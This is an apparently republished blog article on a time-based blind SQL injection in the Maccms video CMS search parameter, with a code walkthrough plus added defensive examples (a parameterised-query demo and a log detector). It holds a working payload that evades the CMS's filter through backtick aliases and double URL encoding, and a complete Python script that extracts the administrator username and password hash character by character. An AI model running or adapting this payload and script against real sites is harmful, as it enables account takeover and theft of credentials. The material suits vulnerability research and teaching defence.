
Maccms SQL injection Analysis and how to write the script

2025-01-18 Update. From: SLTechnology News&Howtos (shulou), Network Security


Shulou (Shulou.com) 05/31 Report

This article walks through the Maccms SQL injection and how to write the blind injection script for it, in the hope that it helps readers who want to understand this problem find a simpler way through it.

0x01 Preface

A friend asked me to look into a code audit of Maccms. Running into this injection vulnerability was interesting, so I wrote this analysis.

0x02 environment

Web: phpstudy

System: Windows 10 X64

Browser: Firefox Quantum

Python version: 2.7

Tools: JetBrains PhpStorm 2018.1.6 x64, Seay code audit tool

Setting up the program is also very easy; the installation is done in one step.

0x03 Reproducing the vulnerability

1. First, add a piece of data to the background of the program.

2. When we submit our payload, the page redirect is delayed by more than 3 seconds. URL: http://sb.com/index.php?m=vod-searchpost:wd=))||if((select ascii(length((select(m_name)``from(mac_manager))))=53),(`sleep`(3)),0)#%25%35%63

3. Because this is a blind injection, the administrator account and password are extracted as analysed below.

0x04 Analysis of the SQL execution process

When learning code auditing it also helps to first work out how the SQL is executed, and only then analyse how that leads to SQL injection.

Because this is dynamic analysis, a debugging environment is required; I will not cover installing it here. Please follow this article step by step: https://getpass.cn/2018/04/10/Breakpoint%20debugging%20with%20phpstorm+xdebug/

Turn on this option in PhpStorm (break at the first line of the current script file). That way I do not have to set breakpoints myself and can simply follow the execution flow.

3. First enter some arbitrary search data, then break at the first line of index.php.

4. Press F8 to step down to line 14 and F7 to step into it. Stepping further with F8, you can see the interception rule reach the filtering of POST data; F7 into it leads to the arr_foreach function, which checks whether the passed value is an array, returns the data unchanged if not, and then URL-decodes it with urldecode. Finally, the passed values of wd and test are matched against the interception rule, and execution jumps to the error message if a character sequence from the rule is present. For example, wd=/**/ is blocked because /**/ appears in the interception regular expression.

5. Stepping back out, you arrive at $m = be('get','m'); here the vod-search value passed in m only goes through addslashes.

6. To keep the article from getting too long, I skip the code that does not need close reading. F8 down to line 37 and F7 in: because the parameter we passed is vod, the vod.php file is included and executed.

7. Because our parameter is search, execution comes here; F7 in to see the process. The value is decoded with urldecode until it can no longer be decoded, then filtered by the StopAttack method seen above, and finally replaced by the htmlEncode method.

8. After leaving vod.php, F8 brings us here; F7 in to watch how the SQL is executed. Keep going until the value of markname is vod (the F8 steps before that can be ignored). Stepping in with F7, you can see the SQL being executed here. The statement is the following, with <wd> standing for the search keyword:

```sql
SELECT count(*) FROM {pre}vod WHERE 1=1 AND d_hide=0 AND d_type>0 and d_type not in (0) and d_usergroup in (0) AND (instr(d_name,'<wd>')>0 or instr(d_subname,'<wd>')>0 or instr(d_starring,'<wd>')>0)
```

0x05 Vulnerability analysis

The SQL execution process was analysed above; below we analyse how it turns into SQL injection.

1. Back to the part we skipped earlier, file location inc/common/template.php: you can see the passed P["wd"] value being assigned to $lp['wd']. 2. Looking down at lines 753-755, you can see that our value is spliced in here and then handed to GetOne for execution.

```php
if (!empty($lp['wd'])) {
    // the search keyword is concatenated straight into the WHERE clause
    $where .= ' AND (instr(d_name,\'' . $lp['wd'] . '\')>0 or instr(d_subname,\'' . $lp['wd'] . '\')>0 or instr(d_starring,\'' . $lp['wd'] . '\')>0)';
}
```

3. Constructing the statement: only the middle part is actually executed; the preceding part closes the single quote, and what follows is a comment. If this is not clear, you can use MySQL monitoring software to examine it step by step.

```sql
AND d_hide=0 AND d_type>0 and d_type not in (0) and d_usergroup in (0)
AND (instr(d_name,'))||if((select ascii(length((select(m_name)``from(mac_manager))))=53),(`sleep`(3)),0)#\')>0
  or instr(d_subname,'))||if((select ascii(length((select(m_name)``from(mac_manager))))=53),(`sleep`(3)),0)#\')>0
  or instr(d_starring,'))||if((select ascii(length((select(m_name)``from(mac_manager))))=53),(`sleep`(3)),0)#\')>0)
```

4. But if the statement is submitted directly, dangerous characters are detected: what the rule mainly matches here is the space used as a connector. We can replace the space with an alias (as '') or omit the as and use the alias on its own. The usage of the alias is given in the reference at the end of the article.
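To make the defect concrete from the defender's side, here is an added example (not code from this article or from Maccms) that rebuilds the concatenated instr() search condition from template.php on an in-memory SQLite table and puts a parameterised version of the same query next to it. The table layout, the sample rows and the reduced set of columns are assumptions; SQLite uses -- for line comments where MySQL also accepts #, so the crafted keyword differs from the page's payload in that detail only.

```python
import sqlite3

# Constructed sample catalogue (an assumption, not Maccms's schema): three
# visible rows and two rows hidden by d_hide=1, which the real query's
# "AND d_hide=0" is meant to exclude.
SAMPLE_ROWS = [
    ("Alpha Story", "alpha", 0),
    ("Beta Story", "beta", 0),
    ("Gamma Story", "gamma", 0),
    ("Hidden Draft", "draft", 1),
    ("Hidden Draft 2", "draft2", 1),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE vod (d_name TEXT, d_subname TEXT, d_hide INTEGER)")
    conn.executemany("INSERT INTO vod VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def count_unsafe(conn, wd):
    """WHERE clause built by string concatenation, in the shape of the
    template.php snippet: the keyword is spliced between single quotes."""
    where = (" AND (instr(d_name,'" + wd + "')>0"
             " or instr(d_subname,'" + wd + "')>0)")
    sql = "SELECT count(*) FROM vod WHERE 1=1 AND d_hide=0" + where
    return conn.execute(sql).fetchone()[0]


def count_safe(conn, wd):
    """Same search with bound parameters: the driver passes wd as data, so the
    quotes and parentheses inside it can never rewrite the WHERE clause."""
    sql = ("SELECT count(*) FROM vod WHERE 1=1 AND d_hide=0"
           " AND (instr(d_name,?)>0 or instr(d_subname,?)>0)")
    return conn.execute(sql, (wd, wd)).fetchone()[0]


def demo():
    conn = make_db()
    ordinary = "Alpha"
    # Closes the quoted keyword and the parenthesised search condition, adds an
    # always-true alternative and comments out the rest, exactly the "close the
    # quote, then comment" shape described above. The d_hide=0 restriction is lost.
    crafted = "')>0) or 1=1 -- "
    return {
        "ordinary_unsafe": count_unsafe(conn, ordinary),  # 1
        "ordinary_safe": count_safe(conn, ordinary),      # 1
        "crafted_unsafe": count_unsafe(conn, crafted),    # 5: hidden rows counted too
        "crafted_safe": count_safe(conn, crafted),        # 0: the keyword stays a literal
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The point of the pair is that no amount of blacklist matching in chkSql is needed for count_safe: the placeholder keeps the keyword out of the SQL grammar altogether, which is the fix for this class of bug.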

5. We execute it again and check with the MySQL monitoring tool in Seay's code audit tool: our spaces and the trailing \ have been escaped.

Remember the chkSql method? It first runs urldecode, then the StopAttack match, and finally htmlEncode. After that there is an addslashes filter in the Be method, which escapes the trailing \ into \\. htmlEncode in turn encodes the preceding space.

```php
// reconstructed from the walkthrough above: decode, blacklist-match, then HTML-encode
function chkSql($s) {
    global $getfilter;
    if (empty($s)) {
        return '';
    }
    // decode repeatedly until the value no longer changes (step 7 above)
    while (($decoded = urldecode($s)) !== $s) {
        $s = $decoded;
    }
    // match against the $getfilter interception rule; jumps to the error page on a hit
    // (call form as described in the text; the exact signature is not shown on the page)
    StopAttack('wd', $s, $getfilter);
    return htmlEncode($s);
}
```

6. Here we can use URL encoding to get past htmlEncode; see an HTML URL encoding table for details. The trailing \ can be sent URL-encoded as %5c, or double-encoded as %25%35%63.

7. The payload we construct is then as follows; it queries the length of the administrator account field: wd=))||if((select ascii(length((select(m_name)``from(mac_manager))))=53),(sleep(3)),0)#%5c

0x06 Writing the blind injection script

Of course, blind injection is usually not done by hand. sqlmap sometimes cannot handle special cases, and then you write your own injection script. I will not explain the code in detail; it can be understood with some Python and MySQL knowledge.

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
# author: F0rmat
# Python 2.7, the version listed in the environment section above
import requests
import time

# character set tried at each position of the value being recovered
dict = "1234567890qwertyuiopasdfghjklzxcvbnm{} QWERTYUIOPASDFGHJKLZXCVBNM @.? "
UserName = ''
UserPass = ''
UserName_length = 0
url = 'http://sb.com/'
url = url + r'/index.php?m=vod-search'


def main():
    global UserName, UserPass, UserName_length, url
    # 1. length of m_name: a response slower than 3 s means the guess was right
    #    (ascii(length(...)) compared with ord(str(i)) only covers single-digit lengths)
    for i in range(30):
        startTime = time.time()
        sql = "))||if((select ascii(length((select(m_name)``from(mac_manager))))={}),(`sleep`(3)),0)#%25%35%63".format(ord(str(i)))
        data = {'wd': sql}
        response = requests.post(url, data=data)  # send request
        if time.time() - startTime > 3:
            UserName_length = i
            print UserName_length
            break
    # 2. recover m_name one character at a time (MySQL substr positions start at 1)
    for num in range(1, UserName_length + 1):
        for i in dict:  # traverse the character set
            startTime = time.time()
            sql = "))||if((select ascii(substr((select(m_name)``from(mac_manager)),{},1))={}),(`sleep`(3)),0)#%25%35%63".format(str(num), ord(i))
            data = {'wd': sql}
            response = requests.post(url, data=data)  # send request
            print data
            if time.time() - startTime > 3:
                UserName += i
                break
    # 3. recover the 32 characters of m_password the same way
    for num in range(1, 33):
        for i in dict:  # traverse the character set
            startTime = time.time()
            sql = "))||if((select ascii(substr((select(m_password)``from(mac_manager)),{},1))={}),(`sleep`(3)),0)#%25%35%63".format(str(num), ord(i))
            data = {'wd': sql}
            response = requests.post(url, data=data)  # send request
            print data
            if time.time() - startTime > 3:
                UserPass += i
                break
    print 'username:' + UserName, 'password:' + UserPass


if __name__ == '__main__':
    main()
```
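From the detection side, the chkSql chain (steps 6 and 7 above) and the probing pattern of the script suggest what to look for: search values that only turn into SQL after more than one round of URL decoding, function names whose spaces or backticks have to be normalised away before they match, and bursts of such requests from one client in which a few responses take about as long as the sleep() argument. The following is an added example and is not part of the article or of Maccms; the record layout, the field names and the thresholds are assumptions, and the sample records are constructed (three ordinary searches and three probes shaped like the script's).

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed records in the shape an application-level request log or a WAF
# audit log might provide: (time, client, the "wd" parameter exactly as the
# application received it, response time in seconds). Layout, thresholds and
# sample values are assumptions for this example, not anything Maccms logs.
SAMPLE_RECORDS = [
    ("10:00:00", "203.0.113.7", "alpha", 0.05),
    ("10:00:01", "203.0.113.7", "beta%20story", 0.04),
    ("10:00:02", "203.0.113.7", "c++ tutorial #3", 0.06),
    ("10:00:03", "198.51.100.9",
     "))||if((select ascii(length((select(m_name)``from(mac_manager))))=53),(`sleep`(3)),0)#%25%35%63", 3.02),
    ("10:00:04", "198.51.100.9",
     "))||if((select ascii(length((select(m_name)``from(mac_manager))))=54),(`sleep`(3)),0)#%25%35%63", 0.05),
    ("10:00:05", "198.51.100.9",
     "))||if((select ascii(substr((select(m_name)``from(mac_manager)),1,1))=97),(`sleep`(3)),0)#%25%35%63", 0.04),
]

# SQL function and keyword names directly followed by "(" after normalisation
SQL_TOKEN = re.compile(
    r"\b(sleep|benchmark|if|ascii|ord|substr|substring|length|select|union|from)\s*\(",
    re.I)


def decode_fully(value, max_rounds=5):
    """URL-decode until the value stops changing, the way chkSql does, and
    report how many rounds changed it (more than one means double encoding)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def normalise(sql_like):
    """Undo the two evasions shown on this page before matching: the empty
    backtick alias standing in for a space, and backtick-quoted names such as
    `sleep`; inline comments are collapsed to a space as well."""
    return sql_like.replace("``", " ").replace("`", "").replace("/**/", " ")


def classify(value, response_time, slow_threshold=2.5):
    """Return the reasons a request looks like a blind-injection probe
    (an empty list for an ordinary search)."""
    decoded, rounds = decode_fully(value)
    tokens = {m.group(1).lower() for m in SQL_TOKEN.finditer(normalise(decoded))}
    reasons = []
    if tokens & {"sleep", "benchmark"}:
        reasons.append("time-based primitive")
        if response_time >= slow_threshold:
            reasons.append("slow response %.2fs" % response_time)
    if rounds > 1:
        reasons.append("url-encoded %d times" % rounds)
    if len(tokens) >= 3:
        reasons.append("sql tokens: " + ",".join(sorted(tokens)))
    return reasons


def scan(records, burst=3):
    """Flag individual requests, and clients that send `burst` or more of them:
    a character-by-character script produces dozens per recovered character."""
    alerts = []
    flagged = defaultdict(int)
    for when, client, value, rt in records:
        reasons = classify(value, rt)
        if reasons:
            flagged[client] += 1
            alerts.append((when, client, reasons))
    bursts = {client: n for client, n in flagged.items() if n >= burst}
    return alerts, bursts


if __name__ == "__main__":
    found, noisy = scan(SAMPLE_RECORDS)
    for when, client, reasons in found:
        print(when, client, "; ".join(reasons))
    print("clients over burst threshold:", noisy)
```

Note that only the probe whose guess was right is slow; the other two are as fast as ordinary searches, so a rule keyed on response time alone misses most of a blind-injection run. Decoding depth and the burst count per client are what pick up the rest.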
